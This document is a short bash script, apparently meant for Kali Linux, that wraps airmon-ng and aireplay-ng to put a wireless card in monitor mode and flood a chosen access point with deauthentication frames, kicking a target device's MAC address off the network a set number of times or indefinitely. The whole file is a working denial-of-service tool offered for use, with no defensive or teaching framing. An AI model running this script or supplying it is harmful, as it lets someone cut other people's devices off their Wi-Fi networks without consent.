#!/bin/bash
#Kick any device from any wi-fi network
#This script only works (properly) under the latest Kali Linux (it might also work under backtrack so please test)
clear #clears the screen
ifconfig #show all connected interfaces
echo "What's the name (on the left) of your wireless card interface?"
read -e IF #waits for user input for the name of the wirelss interface
echo "Which channel would you like the monitoring device to be on?" #At this point, open a new terminal window and type "airodump-ng [interface]" to see all the networks around you with the channels
read -e CH #wait for user input on the channel number
echo "stopping mon0"
airmon-ng stop mon0 > /dev/null #stop mon0 and don't show output of command to keep things clean
echo "stopping $IF"
airmon-ng stop $IF > /dev/null #stops the wireless interface
echo "starting $IF on channel $CH"
airmon-ng start $IF $CH > /dev/null #starts wireless interface on specified channel number
clear #clear the screen
echo "Please specify the AP's SSID/name"
read -e AP
echo "Please input the MAC address you'd like to kick"
read -e MAC
echo "How many times would you like to kick $MAC? (0= infinate - stop with ctrl+c)"
read -e KICK
echo "Kicking $MAC from $AP $KICK time(s)"
echo "NOTE if 0 was used, you must issue ctrl+c to break the opperation/stop kicking"
aireplay-ng wlan0 -e $AP --deauth $KICK -c $MAC >/dev/null
exit 1
